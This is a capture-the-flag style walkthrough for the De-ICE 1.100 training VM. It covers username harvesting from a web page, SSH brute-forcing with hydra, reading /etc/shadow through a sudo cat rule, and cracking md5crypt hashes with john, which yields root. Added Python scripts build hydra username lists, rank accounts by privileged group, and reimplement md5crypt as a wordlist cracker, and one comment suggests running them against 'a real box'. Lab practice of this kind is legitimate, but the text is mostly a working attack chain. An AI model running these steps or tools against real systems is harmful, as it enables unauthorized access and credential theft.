john and hydra against De-ICE 1.100
Set the IP address:
ifconfig eth0 192.168.179.111
Target page:
http://192.168.179.111/index2.php
Pull the mailbox names (the part before the @) off the page to build a username list:
curl http://192.168.179.111/index2.php | grep -E -o "\b[a-zA-Z0-9.-]+@\b"
curl http://192.168.179.111/index2.php | grep -E -o "\b[a-zA-Z0-9.-]+@\b" | cut -d "@" -f1
Extract the full email addresses:
curl http://192.168.179.111/index2.php | grep -E -o "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)"
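The same harvesting step in Python, as an added example that is not part of the original write-up: it parses a page for addresses (handling mailto: links, HTML entities and multi-label domains, which the single-label grep pattern above does not) and turns the mailbox names into login-name guesses for a hydra -L list. The HTML is constructed for the demo and is not the real index2.php; the example.test addresses are made up.

```python
"""Extract e-mail addresses from a fetched page and derive SSH username candidates.

Added example, not from the original write-up. SAMPLE_HTML is a constructed
stand-in for the output of `curl http://<target>/index2.php`.
"""
import re
from html import unescape

# Constructed sample page; the names and mailboxes are made up.
SAMPLE_HTML = """
<html><body>
<p>Mary Mary &lt;marym@example.test&gt;</p>
<p>Pat Patrick - <a href="mailto:patrickp@mail.example.test">patrickp@mail.example.test</a></p>
<p>Contact: t.thompson@example.test, adam.adams@example.test</p>
<p>duplicate: marym@example.test</p>
</body></html>
"""

# Dots in the local part and any number of domain labels are accepted,
# unlike the single-label grep pattern used on the page.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def extract_emails(html):
    """Return unique, lower-cased addresses in order of first appearance."""
    seen = {}
    for addr in EMAIL_RE.findall(unescape(html)):
        seen.setdefault(addr.lower(), None)
    return list(seen)


def username_candidates(emails, min_len=3):
    """Turn mailbox names into login-name guesses for a hydra -L list.

    The mailbox itself is the strongest guess (on De-ICE it is the login).
    For dotted or hyphenated mailboxes such as first.last, the common
    firstlast, flast and firstl forms are added as well.
    """
    out = {}
    for addr in emails:
        local = addr.split("@", 1)[0]
        guesses = [local]
        parts = [p for p in re.split(r"[._-]", local) if p]
        if len(parts) >= 2:
            first, last = parts[0], parts[-1]
            guesses += [first + last, first[0] + last, first + last[0]]
        for g in guesses:
            if len(g) >= min_len:
                out.setdefault(g, None)
    return list(out)


if __name__ == "__main__":
    found = extract_emails(SAMPLE_HTML)
    print("\n".join(found))
    print("--- user.txt ---")
    print("\n".join(username_candidates(found)))
```

Feed the candidate list to hydra as the -L file; duplicates are already removed so no retries are wasted on the SSH rate limit.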
Crack SSH passwords with hydra (-L is the username list, -P the password list; -t 5 limits the parallel connections, which SSH needs to avoid dropped attempts):
hydra -L /home/user.txt -P /home/unix_passwords.txt -t 5 ssh://192.168.179.111
Contents of user.txt:
princess
marym
patrickp
thompsont
benedictb
genniege
michaelp
elong
aadams
bbanter
ccoffee
nostradamus
bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
From /etc/passwd:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
aadams' primary group is GID 10 (the fourth field in /etc/passwd), which is wheel, even though the wheel line in /etc/group only names root. wheel is the administrative group on Slackware-style systems, the one normally allowed to use su and sudo, so aadams is the account to go after.
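The membership check above is easy to get wrong by only reading /etc/group, so here it is done properly as an added example (not part of the original write-up): primary GID from /etc/passwd plus the supplementary lists in /etc/group, then a report of who lands in a privileged group. The inputs are the lines quoted on the page; GID 100 has no line in the quoted /etc/group excerpt, so it is reported by number.

```python
"""Resolve effective group membership from /etc/passwd and /etc/group.

Added example, not part of the original write-up. The two inputs are the
lines shown on the page (the /etc/group excerpt and three /etc/passwd rows).
"""

GROUP_FILE = """\
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
"""

PASSWD_FILE = """\
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
"""

# Groups that usually translate to "can become root": wheel on
# Slackware/Slax, sudo or admin on Debian-family systems.
PRIVILEGED_GROUPS = {"wheel", "sudo", "admin", "root"}


def parse_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text):
    """Map login -> primary GID."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def effective_groups(passwd_text, group_text):
    """Map login -> sorted group names.

    The primary group lives only in /etc/passwd: a user with GID 10 is in
    wheel even when the wheel line in /etc/group does not list them.
    Supplementary groups come from the member lists in /etc/group.
    """
    groups = parse_group(group_text)
    by_gid = {gid: name for name, (gid, _) in groups.items()}
    result = {}
    for login, gid in parse_passwd(passwd_text).items():
        result.setdefault(login, set()).add(by_gid.get(gid, f"gid={gid}"))
    for name, (_, members) in groups.items():
        for member in members:
            result.setdefault(member, set()).add(name)
    return {login: sorted(g) for login, g in result.items()}


def privileged_users(passwd_text, group_text):
    """Logins whose effective groups include one of PRIVILEGED_GROUPS."""
    return sorted(
        login
        for login, g in effective_groups(passwd_text, group_text).items()
        if PRIVILEGED_GROUPS & set(g)
    )


if __name__ == "__main__":
    for login, g in effective_groups(PASSWD_FILE, GROUP_FILE).items():
        print(f"{login}: {', '.join(g)}")
    print("worth targeting:", privileged_users(PASSWD_FILE, GROUP_FILE))
```

Run it against a real box with the two files read from /etc; the privileged list is the order in which to spend cracked credentials.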
Check what aadams may run with sudo -l:
aadams@slax:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*
NOEXEC only stops those commands from spawning other programs; it does nothing to stop cat running as root from reading root-only files. The last entry forbids using sudo to su to root, which is why the shadow file is the way in.
Run cat through sudo:
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
Crack the shadow hashes with john (mm.txt holds the copied shadow lines):
john --format=aix-smd5 --wordlist=/home/rockyou.txt mm.txt
The $1$ prefix marks md5crypt hashes; john's standard format name for them is md5crypt, and it autodetects them when --format is omitted.
Results:
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
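What john is doing for these $1$ hashes, as an added example that is not part of the original write-up and not john's code: md5crypt reimplemented from the crypt(3) $1$ algorithm with hashlib only, then a wordlist run over the root line quoted above. The word list is a constructed stand-in for rockyou.txt.

```python
"""Crack $1$ (md5crypt) shadow hashes against a word list, the way john does.

Added example, not from the original write-up and not john's code. md5crypt
is reimplemented from the crypt(3) $1$ algorithm. ROOT_SHADOW is the root
line the page shows; WORDLIST is a constructed stand-in for rockyou.txt.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value, n):
    """md5crypt's own base64 variant: n chars, least significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password, salt):
    """Return the full '$1$salt$hash' string for password and (<= 8 byte) salt."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in the alternate digest, one byte per byte of password.
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    # Bit-walk over the password length: NUL for 1 bits, first byte for 0 bits.
    i = len(password)
    while i:
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds; this is what makes the format slow to brute-force.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    # Byte shuffle fixed by the algorithm, then 22 chars of encoding.
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + encoded


def crack_shadow_line(shadow_line, wordlist):
    """Return (user, password) for the first word matching the line's $1$ hash, else None."""
    user, hash_field = shadow_line.split(":")[:2]
    if not hash_field.startswith("$1$"):
        raise ValueError(f"{user}: not an md5crypt hash ({hash_field[:3]!r})")
    _, _, salt, _digest = hash_field.split("$", 3)
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode()) == hash_field:
            return user, word
    return None


# From the page's `sudo cat /etc/shadow` output.
ROOT_SHADOW = "root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::"
# Constructed mini word list standing in for rockyou.txt.
WORDLIST = ["password", "123456", "slax", "tarot", "nostradamus"]

if __name__ == "__main__":
    print(crack_shadow_line(ROOT_SHADOW, WORDLIST))
```

Each guess costs 1002 MD5 calls, so pure Python manages only a few thousand candidates per second; that is the gap john's optimised md5crypt code closes, and the reason the word list matters more than raw speed here.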
Logging in as root over SSH is refused: root is not allowed to log in remotely.
Log in as a normal user instead and su to root with the cracked password.
rockyou.txt download link:
https://pan.baidu.com/s/1hfnY4bkZ9UABbQ_kdjRUfw